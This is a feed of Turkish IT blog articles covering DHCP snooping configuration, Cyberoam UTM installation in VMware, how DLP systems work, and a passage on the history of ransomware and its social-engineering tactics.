Gördüğünüz gibi artık makinalarımız ip adresi alabiliyor durumdadır. Bizim DHCP sunucumuzun portu haricinde bir porttan herhangi biri DHCP Offer paketi gönderilmeyecektir. Peki kullanıcılarımız ip adresi alıyor. Ne kadar ip isterse DHCP sunucumuz şuan buna cevap verebilecek durumda yani kullanıcılar DHCP ip havuzumuzu bitirebilir durumdalar. Peki bunun için neler yapabiliriz ?

Bunun için untrust olan bütün interfacelerde bir rate belirliyeceğiz. Bu rate pps (packets per second) yani saniyede geçebilecek paket sayısı ile ifade ediliyor. Bir kullanıcı dhcp’den ip adresi alabilmesi için bu değerin min 2 (Dhcp Discover ve DHCP Request) olması gerekmektedir. Burada belirttiğimiz rate değerinde bir aşım olursa switch tarafında port down edilecektir.

clip_image022

User_2’nin bağlı olduğu Fast Ethernet 0/2 portunda yukarıdaki gibi limitimizi belirledik. Peki bu değer 1 olduğunda ne gibi bir aksiyon olucak onu görelim. Diğer kullanıcımız switch’imiz üzerinde Fast Ethernet 0/3 portuna bağlı burada limitimizi 1 yaparak ne olacağını görelim.

clip_image024

Şeklinde yapılandırmamızı yaptık, şimdi USER_1 kullanıcımızın ip adresini bıraktırıp tekrar almasını isteyelim.

clip_image026

Gördüğünüz gibi ip adresini alamıyoruz. Peki switchde durum nedir ?

clip_image028

Fast Ethernet 0/3 gördüğünüz gibi kırmızı durumda yani interface down olmuştur.

clip_image030

Switch tarafına tekrar baktığımızda yukarıdaki uyarı ve bildirimleri görüyoruz. Fast Ethernet 0/3 üzerinden 2 DHCP paketi alınmış ve DHCP rate limitimizi aştığı için, portumuzun down olduğunu belirtiyor.

Peki, burada tam bir koruma mümkün mü? Saldırgan önceden saniyede birçok paket göndererek kısa sürede DHCP servisimizi servis dışı bırakıyordu. Şuan bunu saniyede 2 paketi geçmeyerek yine yapabilir durumda. Burada da port security tarafından biraz destek alıcağız. Switch’imize bir porttan eş zamanlı öğrenebileceği maximum mac adres sayısını belirteceğiz.

clip_image032

Yukarıdaki gibi bir yapılandırma ile belirttiğimiz interface’den 3 cihazdan fazla bir eş zamanlı aşım olduğu zaman default olarak bu portu kapatıyor. Portu kapatmayıp sadece gelen istekleri sınırlamak ve yapılan istek sayısını görmek istiyorsanız bu komutlardan sonra “Switch(config-if)# switchport port-security violation restrict” komutunu girerek bu isteklerin sayısını “Security Violation Count” değeri olarak görüntüleyebilirsiniz.

clip_image034

Yukarıda da görüldüğü gibi belirttiğimiz limit aşımını yaptığımızda Fast Ethernet 0/2 interface’i Secure-shutdown konumuna geçerek kendini kapatıyor. Bu kapamayı gerekli düzenlemeleri yaptıktan sonra interface içerisine girerek“shutdown” komutunu girdikten sonra “no shutdown” komutunu girerek tekrar up duruma getirebiliriz.

clip_image036

 

İnterface bu işlemimizden sonra tekrar Secure-up durumuna geçmiş bulunuyor.Buraya kadar yaptığımız yapılandırma adımlarını tüm kullanıcı interfacelerinde aktif edelim şimdide,

clip_image038

Bildiğiniz gibi Fast Ethernet 0/1 interface’i bizim trust olarak belirlediğimiz DHCP sunucumuzun bulunduğu porttur. Yukarıdaki komutlarımızlada az önce Fast Ethernet 0/2 üzerinde yaptığımız yapılandırmaları 0/2-24 şeklinde range belirterek 2. Porttan 24. Porta kadar olan tüm portlara uygulamış olduk.

Birde debug çıktısına bir göz atalım. Makinalardan bir DHCP discover mesajında neler oluyor ona bakalım.

clip_image040

Yukarıdaki komutumuzla dhcp snooping packetleri için bir debug açtık.

clip_image041

Yukarıda bir makinamızın DHCP sunucumuzdan ip adresi talep ettiğinde aldığımız debug çıktısını görüyoruz. Şimdide yapımızın genel dhcp snooping yapılandırma durumunu görüntüleyelim.

clip_image043

 

Yukarıda da gördüğünüz gibi DHCP Snooping yapılandırmamızın dahil olduğu vlan, bizde sadece default vlan olduğu için Vlan 1 gözüküyor. DHCP sunucumuzun bağlı olduğu porta DHCP paketleri için bir limit belirtmediğimizden limitsiz ve portun da trusted olduğu görülmektedir.

Peki yapılandırmamızın başlarında bir veritabanı oluşturmuştuk birazda onun ne işimize yaradığına bakalım,

clip_image045

 

“Show ip dhcp snooping binding”  komutu ile bu veritabanımızdaki verileri görüntüleye biliyoruz. Hangi interface’den hangi mac adresi ile aldığı ip adresi ve kira süresini görebiliyoruz. Bu veritabanını ayrıca Ip source guard yapılandırmasında da kullanabiliriz.

clip_image047

Ayrıca “show ip dhcp snooping database” komutu ile oluşturduğumuz veritabanının lokasyonu, zaman bilgileri, okuma, yazma ve bunlarda oluşan hataların sayıları gibi değerleri görüntüleyebiliriz.

Bu yazımızda da DHCP Snooping nedir, nerede ve ne şekilde uygulanıcağı konusuna basit anlamda değinmiş olduk. Bir sonraki makalemizde görüşmek üzre...

Subnetimiz Çözümpark, pingimizin daim olması dileğiyle... J

 

 

Cyberoam Firewall ve UTM Ürününün Sanal Platformda Kurulması

$
0
0

Merhabalar bu makalemde sizlerle piyasalarda Firewall ve UTM cihazı olarak bilinen cyberoam cihazının sanal sistemlerde nasıl kurulduğunu anlatmaya çalışacağım.

Makale sonunda cyberoam UTM ürünün sanal platformda nasıl kurulduğunu öğrenmiş olacaksınız.

Kurulumları bilgisayarım üzerindeki VMware Workstation 12 Player ile yapacağım sizler farklı sanal platformlarda yapabiliriniz. 

Öncelikle tarafınıza verilen demo ya da satın aldığınız Appliance Key gerekmektedir. Bunun sebebi ilgi key ile http://www.cyberoam.com adresine https://customer.cyberoam.com customer login kısmından aşağıdaki gibi Register your Appliance kısmına tıklıyoruz.

 

clip_image002

Size verilen Appliance key ile aşağıdaki gibi Register oluyorsunuz bu Register işleminde size bir cyberoam hesabı oluşmaktadır.

clip_image003

Bu işlemden sonra karışınıza aşağıdaki gibi ekran gelmektedir. Kullanacak olduğumuz Appliance key Register ettik.

 

clip_image005

Bundan sonraki işlem indirme işlemidir aşağıdaki Download yazısı Register işleminden 10-15 dk sonra gelmektedir bu süreçte beklememiz gerekmektedir.

clip_image007

Download dedikten sonra karşımıza aşağıdaki gibi ekran gelmektedir bu ekranda hangi sanal siste için indirme yapacaksınız diye sormaktadır ben VMWARE kullanacağım siz hangi platformu kullanmak isterseniz seçebilirsiniz.

clip_image008

İndirme işlemi gerçekleşti indirilen dosya zip den çıkartılmalıdır.

clip_image010

Zip dosyasından çıkartıldıktan sonra 3 adet dosya göreceksiniz…

clip_image012

 

Bundan sonraki işlem sanal sistemde kuruluma başlamaktır. Cihazım üzerindeki yazılımı açıyorum ve Open a Virtual Machine menüsüne tıklıyoruz.

clip_image014

 

Sonrasında aşağıdaki gibi indirmiş olduğumuz vm dosyasını hedef olarak göstererek Aç diyoruz…

clip_image016

 

Aç dedikten sonra bizden sanal makinemize bir isim veremiz istiyor istediğiniz isimi yazabilirsiniz…

clip_image018

 

Import diyerek devam ediyoruz. Aşağıda gördüğünüz üzere import işlemi başladı.

clip_image020

Cihazımız import edildi şimdi cihazımıza start verme zamanı geldi

 

clip_image022

Cihazımıza start verdik ve aşağıdaki gibi açılmaya başladı.

clip_image024

Bu işlemden sonra siyah ekranda password yazısını görüyorsanız kurulum tamamlanmıştır.

Cyberoam cihazının default kullanıcı adı admin şifresi admin şeklindedir.

clip_image026

 

Admin yazarak giriş yaptık ve karşımıza aşağıdaki gibi ekran gelmiştir.

clip_image028

Cyberoam cihazının sanal platformda üzerinde gelen 3 adet interface seçeneği vardır.

Lan:172.16.16.16/24

WAN: DHCP

DMZ: kapalı

Bilgiler aşağıdaki gibidir.

 

clip_image030

Bu işlemlerden sonra şimdi cyberoam cihazına bağlanmakta kendi bilgisayarıma 172.16.16.o networküne bağlanmak için ip adresi veriyorum.

 

clip_image032

 

Yukarıda görüldüğü gibi cyberoam cihazına bağlanmak için ip adresi verdim artık tarayıcı üzerinden cihaz bağlanmak kaldı.

Aşağıda görüldüğü üzere cyberoam cihazının Ara yüzü gelmiştir.

clip_image034

Bu kısımda Username: admin Password: admin yazarak login işlemini gerçekleştiriyoruz.

clip_image036

İlk giriş ekranında görüldüğü üzere cihaz üzerindeki bilgiler aşağıdaki gibidir.

clip_image038

Daha önce bahsettiğimiz üzere default olarak 3 farklı interface gelmektedir.

 

clip_image040

 

Bazı kurumlara bu sayı yetmeye bilir bunu artırmak için vm üzerinden işlem yapmamız gerekmektedir.

Aşağıdaki gibi menüleri takip ediyoruz.

clip_image041

Aşağıda görüldüğü üzere network adapter ekleme işlemini gerçekleştiriyoruz.

clip_image043

Benim fiziksel bağlantılarım gereğince Bridge seçmek zorundayım siz kendinize göre diğer seçenekleri kullanabilirsiniz.

clip_image045

Finish işleminden sonra Sanal cihazın reboot edilmesi gerekmektedir.

clip_image047

Reboot işleminden sonra 4. İnterface görüldüğü üzere gelmiştir. Sanal sistem en fazla 10 adet interface desteklemektedir.

Kurulum burada sona ermiştir bundan sonraki işlemler formlarda yayınlanmıştır.

Umarım yararlı olmuştur.

DLP Gerçekten Ne İşe Yarar?

$
0
0

Günümüzde DLP, uzun yıllar DLP sistemleri üzerine farklı üreticilerle çalışma şansım oldu. Çok fazla sayıda kurulum ve senaryo üzerine beyin fırtınası yaptık. DLP’nin tanımına baktığımızda Data Loss Prevention ya da Data Leakage Prevention yani Veri Sızıntısı Engelleme anlamına gelmektedir.  Peki, Saldırı Engelleme Sistemleri, Antivirus’ler ya da Firewall mekanizmaları veri sızıntısı engelleme yapamıyorlar mı da DLP sistemine gerek duyulmaktadır. Bu konuyu biraz açalım.

 

clip_image002

 

Net bir şekilde iletmek gerekir ki bütün güvenlik katmanları Antivirus Saldırı Engelleme Sistemlerin (IPS),  Antibot  Engelleme Yazılımları, Web Güvenliği ya da URL Filtering Çözümleri, SIEM, MDM ve  Anomaly Tespiti yapan yazılımlara kadar ve değinmediğimiz diğer ağ güvenliği  yazılımı ve donanımları, Kurumsal Veri Sızıntısının Engellenmesi noktasında destek olurlar. DLP’nin ayrıldığı nokta şudur. Kurum içindeki kullanıcıyı kontrol etmek.

Ağ güvenliğinde şirketler çoğu zaman kendilerini Dışardan gelebilecek saldırılara karşı korurlar. Saldırıların ve sızıntıların içerden gerçekleşebileceği gerçeğinide biliriz fakat bunu raporlamak ya da engellemek adına aksiyon noktasında sorunlar olduğu da gün gibi ortadadır.

 

DLP’nin teknik detaylarına girmeden  bu çözüme neden yatırım yapmaları konusunda kısaca bahsetmek istiyorum.

DLP’nin ortaya çıkması ve hatta ticari bir ürün haline gelmesinde rol oynayan motivasyonların başında kurumların özel/gizli bilgilerinin kaçağından ötürü yaşadıkları zararlar gelir. Bunun yanında sektörel düzenleyici örgütlerin yaptırımları da şirketleri veri güvenliğini sağlama konusunda mecbur bırakmıştır. Sağlık sektöründe HIPAA, finansta GLBA, BASEL II ve PCI (Payment Card Industry)Standartları gibi regülasyon yaptırımları bilgi güvenliği ve dolayısıyla DLP konusunda ciddi adımların atılmasında önemli rol oynar. Hatta bunların tümünü geride bırakabilecek kadar kritik olan, Wall Street borsasında kağıdı işlem gören her kurumun çok sıkı denetimlere maruz kaldığı Sarbanes-Oxley yasaları DLP konusunda en önemli yaptırımdır diyebiliriz.

 

DLP sistemi teknik olarak hem network’ü hemde istemcileri kontrol altında tutar. Projeye başlamadan once Dosya sistemi,  ve Veritabanlarında, sharepoint vb yerlerde tutulan verilerin kritiklik seviyesi üzerine bir klasifikasyon yapılması gerekmektedir.

Şirket içi her departman kendi tutuğu veri için kritiklik sırası belirlemeli ve sonrasında bu kritik veriler DLP sistemine tanıtılmalıdır.

 

DLP bir verinin kritik olup olmadığını anlamaz , Ta ki siz ona bu kritiktir diyene kadar. Peki DLP’ye kritik verileri nasıl tanıtırsınız ? Bunun için birkaç metod vardır. Keyword dediğimiz anahtar kelimeler DLP’ye tanıtılabilir. Maaş, bodro, çok gizli, strateji dökümanı vb kontrol etmek isteyeceğiniz kelimeler eklenebilir. Kimin bu kelimeleri içeren dökümanları post ettiği ya da bu yazışmaları yaptığı anında DLP yönetim ekranına gelmeye başlar.

 

Bir diğer metodda Regex’dir. Özellikle ürün numaraları, kredi kartı numaraları, TC kimlik No vb kendi içinde bir mantığı olan rakamlardır.

Birçok DLP sisteminde önceden yazılmış regex’ler bulunmakla beraber kullanıcının kendi Regex’ini yazabilmesi içinde bir alan tahsis edilmiştir.

Özellikle üretim yapan fabrikalardaki ürün kodlarının kendi içindeki mantığı regex’e dökerek dışarı sızan bu ürün numaralarının tespiti yapılabilir.

Dosya Tipi bazlı kontrol ile dışarı sızan çizim dökümanları, Database dosyaları, zipli, şifreli dökümanlar True File Type yani dosya’nın Başlığına bakıp analiz yapabilen bir diğer tanımlayıcıdır.

 

DLP sistemini DLP yapan teknoloji yukarıda bahsettiğim tanımlayıcılar bir tarafa parmak izi teknolojidir. Neden ? Dosya Sunucusunda sadece yöneticilerin eriştiği bir dizindeki kritik verilerinde DLP’ye tanıtılması gerekmektedir. Ya da kuruma ait veritabanınında müşteri bilgisi.

Soru Şu,: Bu bilgileri Kritik olarak nasıl işaretleyeceğiz. Işte parmak izi burada başlıyor. Admin hakkı ile dizin yapısına erişen dlp her dökümanı tek tek açıp içinde text veriyi analiz edip dil bilgisinde gereksiz gördüğü bir takim bağlaç vb gibi kelimeleri yok sayıp, kelimeler arası boşlukları da attıktan sonra ciddi bir matematiksel algoritmaya göre dökümanın hash’ini almaya başlar. Şunu unutmamak gerekir. Parmak izi alınan bir verideki fonksiyon tek yönlüdür. Yani parmak izi alınmış bir dökümandanın hash’inden dökümanın orjinaline geri dönülemez.

 

Peki bu teknoloji bize neyi sağlar. Aslında basit anlamda kritik olarak işaretlediğimiz dökümanın içinden 1 satır bir bilgi alır ve sızdırmaya çalışırsak DLP Parmak izi şunu diyecektir. Sızdırmaya çalıştığın veri daha önceden şu Dosya Sunucundaki \\172.16.2.6\Yönetim\strateji.pdf  dosyasına % 70 benzemektedir gibi bir ağırlık oluşturarak verinin kritik olduğunu algılayabilir. Bu hassasiyet şirketlerin aradığı bir hassasiyettir.

 

clip_image004

 

Fingerprint teknolojisi tam anlamıyla mükemmelmiş gibi bahsettik. Aslında tam anlamıyla değildir. Bu zekanın da zorlandığı alan dosya hacimleri.  Yani 10 Gb’lık bir verin var ve parmak izini alıyorsan sorun yok.

Ama 10 Terabaytlık bir veriyi parmak izini alıp bunun bilgisini istemcilere göndermek konusu gözüktüğü kadar kolay Değil hatta deneyimlerimde pek de mümkün olmadığını gördüm. Teknik olarak Parmak izi alınmış Database ve Dosya sistemindeki verilerin bir shadow kopyası istemciye gönderilir. Birçok DLP sistemi için bu paket 100 mb’dan başlar. Alınan parmak izi boyutu arttıkça sistemdeki yük artmaya başlar. Artan veri miktarı, big data ile beraber kontrol edilmesi zor DLP projelerini de beraberinde getirmektedir. Şirketler gerçekten Yegane değeri olan verilerin parmak izini almalılar. Yani bir kişiyi tanımlamak adına TC kimlik No Yegane bir değerken Doğum Tarihinin parmak izinin alınması yanlıştır. Çünkü aynı doğum tarihine ait başka kullanıcılarda bulunabilir.

 

Günün sonunda Parmak izi teknolojisi DLP sisteminin kalbi olmuş olsada bu algoritmanında zolandığı alanlar var. Alınan Parmak izi boyutunun artması gibi.

 

Biraz bu sebeptendir ki bu teknolojinin üzerine Machine Learning Algoriması geliştirildi. Bu algoritma parmak izinden farklı olarak öğrenmeye dayalı bir algoritmadır. Temel olarak pozitif ve negative örnekler sisteme tanıtılır. Tanıtılan örnek veriler ML algoritmasının öğrenmesi içindir. Tanıtılan verilere göre bir sonraki gönderilen verinin kritik olup olmadığı ile ilgili bir sonuç çıkartabilmesi genel motivasyondur.

 

ML Mekanizmasının Önümüzdeki süreçte daha fazla gelişeceğiniz ön görüyorum. Limitasyonu daha az olmasına ragmen öğrenme sürecindeki verilecek dökümanlarında doğru seçilmesi gerekmektedir. ML algoritması güvenlikte birçok alanda kullanılmakla beraber DLP entegrasyonu heyecan vericidir. Yine de bu işin başında olunduğunu vurgulamak lazım.

 

Bundan yıllar önce sürekli sorulan bir soru vardı? Hocam iyi güzel parmak izi, Yapay Zeka falan da adam kritik verinin fotoğrafını çekti ve gönderdi buna ne yapacaksınız? Bir APN yapısı yoksa tabi 3G Network’ler için geçerli olmayabilir belki ama şirket içinden dışarıya gönderilen fotoğraflarda OCR ile fotoğrafın içindeki text veri DLP motoruna analiz için gönderilebiliyor. Eskiden fotoğrafı çekilmiş kritik bir veri email yoluyla gönderilir ve DLP sistemi hiç bir log üretemezdi ve bu bir atlatma tekniği olarak kullanılırdı. Son zamanlarda yapılan geliştirmeler ile beraber DLP motorunun OCR analizi ile birleştiğini görüyoruz. OCR analizi içinde DLP üreticileri arasında sıklıkla ABBYY kullanıldığını söylemek lazım. ABBYY OCR analizini en hızlı, stabil ve en doğru karakter tespitini yapabilmesi tercih edilmesini etkin kılmaktadır.

 

Türkiye ‘deki en büyük yanlış algılardan birisi DLP mekanizmasının veri sızıntısını tam anlamıyla engelleyecekmiş gibi bir algı yaratmış olmasıdır. Şu ayrımı unutmamak gerekir. SQL injection yapılarak girilen bir Database’deki verilerin ya da herhangi bir bilinen ya da bilinmeyen bir istismar (exploit) sonucu veritabanına sızılması ile yaşanan ileri derece ataklarda DLP bir engelleme yapamamaktadır.

 

DLP’nin bütün motivasyonu kullanıcı üzerinedir. Kullanıcının hareketlerini gözlemlemektir.  Hayal kırıklılığına uğramamak adına DLP’nin uygulama bağımlı olduğunu unutmamak gerekir. Kurumsal kritik bir veriyi kopyalayıp kişisel mail hesabına IE, firefox ya da Chrome üzerinden göndermeye çalıştığımızda DLP kullanıcıya hesap sorabilirken yandex browser üzerinden yapıldığında bir hesap sormayacağını göreceksiniz. Çünkü hiçbir DLP sistemi bu browser için plugin yazmamıştır.

 

Yanlış algılardan bir diğeri verinin sızdığı kanallardır. Kural Yazarken hangi kritik verinin hangi kullanıcılar tarafından hangi kanalla (HTTP, HTTPS, IM, SKYPE, FTP, Harici Diskler, PCMCIA , Print ,Screenshot vb) çıkmaması gerektiğine karar verirsin. Bu noktada bütün kapıları kapatmak teknik olarak oldukça meşakkatlidir. O yüzden DLP’yi bir penetrasyon aracı gibi kullanmak yanlıştır. Yeteneklerini ve Özelliklerini bilerek kullanmak gerekir ki her yazılımın bir limiti olduğunu unutmamak lazım.

 

DLP’den istenilen Bilgi Şudur; Kim, Neyi, Nereye, Nasıl Göndermektedir Sorusuna yanıt bulunmasını sağlamaktadır. Kullanıcıların gönderdiği verilerin içinde kritik unsur teşkil edecek verileri gönderilecek uyarılarla kullanıcının eğitilmesini sağlar. Kullanıcı bir sistem tarafından kontrol edildiğini düşündüğünden daha dikkatli davranmaya başlar.

 

Şahsi gözlemim şudur; Veri Sızmasının engellenmesi teknik olarak atlatılması basit bir süreçtir. Fakat bir süreç vardır ki DLP sistemlerinin en büyük geri dönüşü bu olmuştur.  BU da şirket çalışanlarının bilincinin artmasıdır.

 

 

 

clip_image006

 

 

DLP demoları sürecinde yaşadığım olayları ele alsam, sanırım bir kitap dolusu medyatik bilgi üretebilirdim diye düşünüyorum J Kurumlarla Gizlilik anlaşması yapmamdan dolayı şirket ismi vermeden birkaç olayı anlatmak istiyorum.

 

Demo çalışması yaptığımız bir şirketin genel müdürü bizlere özellikle şirkete ait strateji dokümanlarının bulunduğu bir dizindeki dokümanları kritik olarak işaretlememizi istedi. Yani DLP’deki ismiyle dokümanların parmak izi alındı. Sistem log üretmeye başladı. Ertesi gün şirket IT müdürü bizi aradı. Finans uzmanı bir çalışanın bilgisayarından ilgili strateji dokümanlarının gmail aracılığı başka bir kullanıcıya gönderildiği gözlemlenmiş. İlk soru Bu log’un yanlış bir alarm olup olmadığını tespit edilmesiydi. Log’u incelediğimizde kullanıcının gerçekken bu işlemi yaptığı gözlemlendi sonrasında gönderdiği verinin gerçekten yüksek derecede kritik dosyalardan olan strateji dokümanı olup olmadığını anlamak için bir diğer log olan adli veri analizine bakıldı. DLP sistemleri sızdırılmaya çalışılan veriyi de şifreli bir şekilde kendi bünyesinde tutar. Bu log’un kontrol edilmesi sonrası konu netleşti. Bir sonraki soru Tabi şuydu, Neden? Veri Sızıntısını gerçekleştiren kullanıcı ile birebir görüşüldüğünde ve gmail adresindeki isim kontrol edildiğinde verinin rakip firmaya gönderildiği tespit edildi.

 

Bir başka vaka; Bu sefer halı firması ve tasarım dosyalarının rakip firmaya iletildiğini düşünüyorlar. DLP sistemi kuruluyor 2 haftalık analiz sonucu parmak izi alınmış dokümanların yine Hotmail aracılığı ile rakip firmaya iletildiği tespit ediliyor ve çalışanın işine son veriliyor.

 

 

Son bir vakadan daha bahsetmek istiyorum.

 

Çalışma yaptığımız başka bir kurumda IT müdürü ile beraber çalışmaya başlıyoruz. Şirket için yazılım geliştiren ekibin kaynak kodları USB aracılığı ile paylaştığı, Dropbox’a gönderdiği ve yine aynı kaynak kodların print alındığı tespit edildi. Bu kurum prosedürü ve iş akışında olmaması gereken bir durumdu. Gizlilik gereği bu kodların bu kadar serbest dolaşması tahammül edilebilir bir durum değildir. Bu vaka ’da DLP’nin yakaladığı kullanıcıların yaptığı yanlış iş akışını düzeltmek oldu. Aslında var olan gizlilik kurallarının ihlal edildiği tespit edildi ve kullanıcılar uyarıldı.

 

Yine DLP sistemi devrede olan bir şirketteki başka bir kullanıcının dizüstü bilgisayarını eve götürdükten sonra kurumsal verileri başka bir kullanıcı iletme çabası ve bunun raporlanması ve kullanıcıya bunu niye yaptın diye sorulduğunda, şirket dışında DLP kontrolünün olmadığını düşünmesi de bir o kadar manidardır.

 

Ağ Güvenliği paranoya üzerine kuruludur. Ne kadar Güvenlik sistemi ve insan kaynağı yatırımı yaparsanız yapın dozajında paranoya olmayan kurumların yaptığı yatırımların karşılığı olmayacaktır.

 

Şunu da unutmamak gerekir, riski sıfırlayamamakta azaltabiliriz. Bu noktada tek yapılması gereken biraz paranoya ve açık kapıların kapatılmasıdır.

 

Fidyecilik Zararlıları ve Evrimi

$
0
0

Fidyecilik yazılımının biraz geçmişine Gidecek Olursak. İlk Çıkış noktası sahte Antivirus Yazılımlarıdır. Birçok isimle bilgisayarlarınızı ücretsiz koruyacağını söyleyen bu yazılımlar kullanıcılara zarar verip karşılığında fidye istemiştir. Sonrasında Fidyecilik yazılımları her geçen gün daha akıllı kodlarla ve sistemlerle karşımıza geldi. Fidye ödeme sistemlerine bakacak olursak bu nokta da ciddi bir ilerleme olduğunu söyleyebiliriz. Sahte Antivirus üzerinden kullanıcı verilerini şifreleyen bu zararlılar ödemeyi Pay-Pal’dan alırken şuanda bütün ödeme işlemleri internet para birimi olarak tabir ettiğimiz Bitcoin üzerinden yapılıyor. Yani Fidyecilik zararlıları kod seviyesinde yaptıkları sürekli geliştirmeyi ödeme sistemine de yansıtmış durumda. İşlem Bitcoin üzerinden yapıldığı için takibi olanaksız hale geliyor.

 

Yazımın Devamında Fidyecilik Yazılımları Nerden Nereye Geldi Sorusunu yanıtlamaya, hatta sadece 2015 yılında Hacker’ların bu alanda yapmış olduğu çalışmaları özetlerken bir taraftandın da bütün bu yazılımların kullanıldığı ortak bir noktanın olduğunu vurgulamak istiyorum. Peki bu nedir? “İNSAN PSİKOLOJİSİ” Evet Bütün Fidyecilik Saldırıları sosyal mühendislik üzerine kurgulanmıştır. Kullanıcının saldırıya maruz kalması için yapılan oltalama saldırısında insanı cezbeden teknikler kullanılır. Örnek: Her ay ödediğin 50 TL’lik ADSL faturası yerine 267 TL’lik fatura’nın mail adresine gönderilmesi ya da Bayram seyran dinlemeden kargo şirketlerinin işinin arttığı bilindiğinden kullanıcıya kargo içerikli bir mail gönderilmesi gibi. Sürekli güncel ve fazla kullanıcıya hitap eden içerikler kullanılır ve hazırlanır. Günün sonunda insanoğlu duygusal bir varlıktır. Bu sebeple Güvenlikte bu nokta en fazla manipüle edilen alan olmuş ve olmaya devam edecektir.

 

 

 

clip_image002

 

 

Bir diğer Ransomware Örneği benimde üzerine çok çalışmak zorun kaldığım Türk Polisi Siber Suç Mücadele Bölümü virüsü olarak bilinen fidye zararlı yazılımı (ransomware), Genellikle uygun olmayan sitelerden video izletme bahanesiyle bulaşan bir virüstür. İnternette Dolaşırken izlemek istediğiniz video da karşınıza Flash Güncelleme ekranı gelir. Kullanıcı video izlemek için zararlı .exe dosyasını indirmek zorunda bırakılır ve kullanıcı bilgisayarına virüs bulaştırılır. Bilgisayarına virüs bulaşan kişi daha sonra hiçbir işlem yapamaz çünkü windows login ekranında önce zararlı devreye girerek bilgisayarı kitler ve kolluk kuvveti tarafından bilgisayarına el konulduğu uyarısı karşısına çıkar. Bu kilitleme işleminin ortadan kaldırılması için belli bir miktar para talebinde bulunulur. Bilgisayar hangi ülkeye ait IP adresi ile internete bağlanıyorsa o ülkenin kolluk kuvvetinin logosu ve ismi otomatik olarak ekranda çıkmaktadır.

 

Özellikle Antivirus atlatmak için tasarlanmış bu tarz yazılımların bu örneğinde de Antivirus yazılımları zor günler geçirdi. Benim sadece işin içinde bulunduğum 15 farklı vaka olmuştu. Web’de gezinirken özellikle Flash’ınız güncel değil lütfen Güncelleyin şeklinde kullanıcıların güncelleme yapacakları şeklinde indirdikleri ve bilgisayarları yeniden başladıktan sonra alttaki ekran görüntüsün gördükleri bir zararlı.

 

Üzerinde çalıştığım bir başka variant’ta kullanıcının kamerasında aktif edip “Anlık görüntü merkeze iletilmektedir” gibi bir ibare ile fidyeyi daha hızlı almak için aksiyonlarda bulunulmuştur.

 

Elimde resmi bir data olmasa da binlerce Ev kullanıcısı ve az oranda da kurumsal kullanıcıların bu zararlıdan etkilendiğini iletmek faydalı olacaktır.

 

clip_image004

 

Daha Önceden Hesperbot Zararlısını hatırlayanlar bilir oltalama saldırısı ile kullanıcılara ulaşan bankacılık trojanıydı. Daha önceki bankacılık viruslerinden farklı olarak akıllı telefona da sızarak kurduğu sahte uygulama ile 3 way Authentication olarak tabir ettiğimiz 3. Doğrulama aşamasında yani telefona gelen SMS’i de dinleyebildiğinden kullanıcıların bankacılık sistemine giriş yapılabiliyordu. Tabi bunun cryptolocker ile benzerliği yok çünkü Cryptolocker Fidyecilik (Ransomware) Zararlısı. Hesperbot ise Bankacılık Zararlısı. Peki Neden bu konuya girdim J Aslında iki zararlının da kullanıcıya ulaşma şekli aynı. Her iki zararlı da kullanıcılara sahte faturalarla servis edildi.

 

 

 

Cryptolocker Zararalısının ilgili dosya tiplerini şifrelediğini biliyoruz. 

 

3fr, accdb, ai, arw, bay, cdr, cer, cr2, crt, crw, dbf, dcr, der, dng, doc, docm, docx, dwg, dxf, dxg, eps, erf, indd, jpe, jpg, kdc, mdb, mdf, mef, mrw, nef, nrw, odb, odm, odp, ods, odt, orf, p12, p7b, p7c, pdd, pef, pem, pfx, ppt, pptm, pptx, psd, pst, ptx, r3d, raf, raw, rtf, rw2, rwl, srf, srw, wb2, wpd, wps, xlk, xls, xlsb, xlsm, xlsx. Yani Microsoft ürünlerinin dosyaları (word, excel vb), Adobe ürünlerinin dosyaları (ai, eps, psd vb), resim/fotoğrafları (jpg, raw vb), ve çok farklı uzantılarda dosyaları etkilemektedir.

 

Genellikle pdf görünümlü exe dosyalarından gelmektedir. Eğer uzantı, kurulum sırasında default olarak görünmeyecek şekilde ayarlı ise pdf mi exe mi ayırt edilemeyecektir ve görünümü pdf olduğundan exe olma ihtimali aklımıza bile gelmeyecektir. Pdf zannettiğimiz dosyayı açtığımızda sistemi kilitleyecektir, cryptolocker fidye isteyecektir. Bilgisayarı baştan başlatmak, pdf’i silmek ya da benzeri hareketler işe yaramayacaktır. Çünkü Pdf’i açmanız demek Executable dosyayı tetiklemeniz anlamına gelir. Yani Şifreleme arka tarafta zaten başlamış olacaktır.

 

Yine Bahsedilmesi gereken, bu yazının en önemli konularından birisi Cryptolocker’ın içine eklenen “Captha”. Aşagidaki ekran görüntüsünde sahte Turkcell, Vodafone, PTT vs ile gelen fatura maili içindeki linke tıkladınız ve karşınıza aşagidaki gibi bir ekran geldi. Bu ekran görüntüsünde TTNET, örnek olarak kullandım. Faturayı indirebilmeniz için ekrandaki kodu ilgili textbox’a girmenizi istiyor. Sizde ilgili numarayı giriyor ve indirme işlemine başlıyorsunuz.  Bunun aşamanın kurgulanmasında çok ama çok önemli bir amaç var.  Gelin Biraz bunu konuşalım.

 

Hepimizin bildiği gibi bu tarz geniş kitlelere hitap edecek amaçlı geliştirilmiş yazılımları Satan Firmalar var. Bu Hacking Firmaları zaten bu yazılımı geliştirirken ve müşterisine satarken Hiçbir Antivirus üreticisinin bunu yakalamayacağı üzerine garanti veriyorlar. Fakat bu zararlıları yakalamak için tasarlanmış Antivirus’den daha akıllı ve sofistike sistemler mevcut. Bunlardan en önemlisi Sandbox Teknolojisi, Kumhavuzu Teknolojisi olarak bildiğimiz teknolojinin amacı bilinmeyen zararlı yazılımları kendi içindeki sanal sistem üzerinde test edilip ilgili zararlının kullanıcıya ulaşmadan önce test edilmesi. Riskli Görülen Dosyalar kullanıcıya ulaşmadan karantinaya alınabilir.

 

